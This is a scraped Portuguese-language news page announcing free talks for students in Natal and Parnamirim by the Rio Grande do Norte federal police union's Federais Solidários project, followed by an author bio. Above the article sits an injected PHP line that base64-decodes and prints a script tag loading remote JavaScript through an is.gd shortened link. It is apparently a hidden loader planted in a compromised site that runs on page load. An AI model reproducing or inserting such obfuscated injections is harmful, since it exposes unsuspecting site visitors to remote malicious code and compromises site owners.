$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Projeto Federais Solidários define apresentações em Natal e Parnamirim

Projeto Federais Solidários define apresentações em Natal e Parnamirim
10 Ago 2019

Estudantes de Natal e Parnamirim são os próximos a receber, nos dias 15 e 29 deste mês, o projeto social Federais Solidários, desenvolvido pelo Sindicato dos Policiais Federais do Rio Grande do Norte (Sinpef-RN). O objetivo da equipe é desenvolver, por meio de palestras gratuitas, temas que ajudam na formação de crianças, adolescentes e jovens da rede pública de ensino. Porém, toda a comunidade pode participar.

Em Natal, a unidade selecionada para receber o projeto foi o Centro de Estudos e Biblioteca Professor Américo de Oliveira Costa, na Zona Norte da cidade. As palestras acontecem no dia 15, a partir das 14h. O endereço é Av. Itapetinga, nº 1430, conjunto Santarém, bairro Potengi. A entrada é gratuita.

Em Parnamirim, as palestras acontecem no dia 29, a partir das 15h, na Escola Estadual Professor Arnaldo Arsênico de Azevedo. O colégio fica na Rua Cândido Martins dos Santos, nº 551, bairro Rosa dos Ventos. A entrada também é livre.

“O projeto Federais Solidários representa uma aproximação do trabalho dos agentes federais com os jovens potiguares, levando o conhecimento adquirido ao longo do tempo no exercício da atividade policial, despertando cada um para uma reflexão acerca de temas importantes e relevantes para a formação do caráter de um cidadão”, destaca a policial federal Katrin Paiva.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *